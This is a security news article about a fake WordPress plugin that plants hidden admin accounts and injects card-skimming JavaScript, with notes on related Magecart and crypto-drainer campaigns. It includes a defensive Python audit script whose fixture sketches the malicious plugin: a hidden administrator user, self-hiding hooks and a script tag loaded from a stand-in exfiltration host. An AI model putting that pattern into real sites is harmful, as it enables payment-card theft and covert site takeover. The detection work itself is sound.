Fraudulent WordPress plugin exposes ecommerce sites to credit card theft


Threat hunters have discovered a rogue WordPress plugin capable of creating fake admin users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“Like many other malicious or fake WordPress plugins, this one contains some misleading information at the top of the file to give it a veneer of legitimacy,” said security researcher Ben Martin. “In this case, comments claim the code is ‘WordPress Cache Addons’.”

Malicious plugins typically find their way into WordPress sites through a compromised administrator or by exploiting security flaws in another plugin already installed on the site.

Once installed, the plugin replicates itself into the mu-plugins (must-use plugins) directory so that it is automatically enabled and hides its presence from the admin panel.

“Since the only way to remove any of the mu plugins is to manually delete the file, the malware does everything it can to prevent this,” Martin explains. “The malware achieves this by deregistering callback functions for hooks that plugins like this normally use.”

The rogue plugin also comes with an option to create an administrator user account and hide it from the legitimate website administrator, to avoid alerts and retain access to the target for a longer period of time.

The ultimate goal of the campaign is to inject credit card-stealing malware into the payment pages and exfiltrate the information to an actor-controlled domain.
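The behaviours described above (a file dropped into mu-plugins, hooks used to hide the plugin and a rogue user from the dashboard, an administrator account created from code, and a script tag injected into the front end) can each be checked for from the filesystem. The following audit script is an added example written for this article, not code from Sucuri or from the plugin they analysed; the indicator names and regular expressions are assumptions that encode the described behaviours, and the two mu-plugin files it scans are constructed fixtures, not real malware.

```python
"""Audit a WordPress wp-content/mu-plugins directory for behaviours described above."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicator names and patterns are assumptions for this example: they encode the
# behaviours the article describes, not signatures for the specific plugin found.
INDICATORS = {
    # filtering the plugin list or the must-use tab is how a plugin hides itself
    "hides_plugin_listing": re.compile(
        r"add_filter\s*\(\s*['\"](all_plugins|show_advanced_plugins)['\"]"),
    # user creation followed closely by the administrator role
    "creates_admin_user": re.compile(
        r"(wp_insert_user|wp_create_user)[\s\S]{0,400}?['\"]administrator['\"]"),
    # hooking the user query is how a rogue account is kept off the Users page
    "hides_user_from_list": re.compile(
        r"add_(action|filter)\s*\(\s*['\"]pre_user_query['\"]"),
    # a remotely hosted script tag inside a mu-plugin is rare for legitimate code
    "external_script_tag": re.compile(
        r"<script[^>]*src\s*=\s*['\"]https?://"),
    # common obfuscation wrappers around an embedded payload
    "obfuscated_payload": re.compile(
        r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\("),
}


def scan_file(path: Path) -> list[str]:
    """Return the indicator names whose pattern matches the PHP source at `path`."""
    src = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def audit_mu_plugins(wp_content: Path,
                     allowlist: frozenset[str] = frozenset()) -> dict[str, list[str]]:
    """Scan every PHP file under wp-content/mu-plugins and report hits per file.

    `allowlist` holds file names the site owner knows they deployed; those are skipped
    so the report only lists files that need a human look.
    """
    mu_dir = wp_content / "mu-plugins"
    findings: dict[str, list[str]] = {}
    if not mu_dir.is_dir():
        return findings
    for php in sorted(mu_dir.rglob("*.php")):
        if php.name in allowlist:
            continue
        hits = scan_file(php)
        if hits:
            findings[php.name] = hits
    return findings


# Constructed fixtures (not real plugins): one harmless mu-plugin and one skeleton that
# carries the described behaviours but calls helper functions that are never defined.
BENIGN_MU = """<?php
/* Plugin Name: Site Maintenance Notice */
add_action('admin_notices', function () {
    echo '<div class="notice">Backups run nightly.</div>';
});
"""

SUSPICIOUS_MU = """<?php
/* Plugin Name: WordPress Cache Addons */
add_filter('all_plugins', 'cache_addons_hide_self');
add_action('init', function () {
    if (!username_exists('cacheadmin')) {
        wp_insert_user(['user_login' => 'cacheadmin',
                        'user_pass'  => 'PLACEHOLDER',
                        'role'       => 'administrator']);
    }
});
add_action('pre_user_query', 'cache_addons_hide_user');
add_action('wp_footer', function () {
    echo '<script src="https://exfil.example.invalid/c.js"></script>';
});
"""


def demo() -> dict[str, list[str]]:
    """Build the constructed install in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = Path(tmp) / "wp-content" / "mu-plugins"
        mu.mkdir(parents=True)
        (mu / "maintenance-notice.php").write_text(BENIGN_MU)
        (mu / "cache-addons.php").write_text(SUSPICIOUS_MU)
        return audit_mu_plugins(Path(tmp) / "wp-content")


if __name__ == "__main__":
    # On a live site, call audit_mu_plugins(Path("/var/www/html/wp-content")) instead.
    for name, hits in demo().items():
        print(f"{name}: {', '.join(hits)}")
```

The scan is deliberately file-based rather than asking WordPress for its plugin list, because a plugin that filters `all_plugins` and `show_advanced_plugins` would be missing from that list; comparing the directory contents against what the site owner actually deployed is the check that survives the hiding hooks.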

“Since many WordPress infections occur through compromised users of wp-admin administrators, it only makes sense that they had to work within the limitations of the access levels they have, and installing plugins is certainly one of the most important skills that WordPress admins own,” said Martin.

The revelation comes weeks after the WordPress security community warned of a phishing campaign that alerts users to an unrelated security flaw and tricks them into installing a plugin under the guise of a patch. The plugin in turn creates an admin user and implements a web shell for persistent remote access.

Sucuri said the threat actors behind the campaign are using the “RESERVED” status associated with a CVE identifier, which applies when an identifier has been reserved for use by a CVE Numbering Authority (CNA) or security researcher but the details have yet to be published.


It also comes as the website security company discovered another Magecart campaign that uses the WebSocket communications protocol to manage the skimmer code on online stores. The malware is activated when a shopper clicks a fake ‘Complete Order’ button that is placed over the legitimate checkout button.

Europol’s spotlight report on online fraud published this week describes digital skimming as a persistent threat resulting in the theft, resale and misuse of credit card data. “An important evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect,” the report said.

The EU law enforcement agency also said 443 online merchants were notified that their customers’ credit or debit card details had been compromised via skimming attacks.

Group-IB, which also worked with Europol on the cross-border cybercrime counter operation codenamed Digital Skimming Action, said it has detected and identified 23 families of JS sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter and R3nin, which were used against companies in 17 different countries in Europe and America.

“A total of 132 JS sniffer families are known to have compromised websites worldwide by the end of 2023,” the Singapore-based company added.

That’s not all. Fake ads have been found on Google Search and Twitter for cryptocurrency platforms promoting a cryptocurrency drainer called MS Drainer, which is estimated to have already looted $58.98 million from 63,210 victims through a network of 10,072 phishing websites since March 2023.

“By targeting specific audiences via Google search terms and the following basis of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” ScamSniffer said.
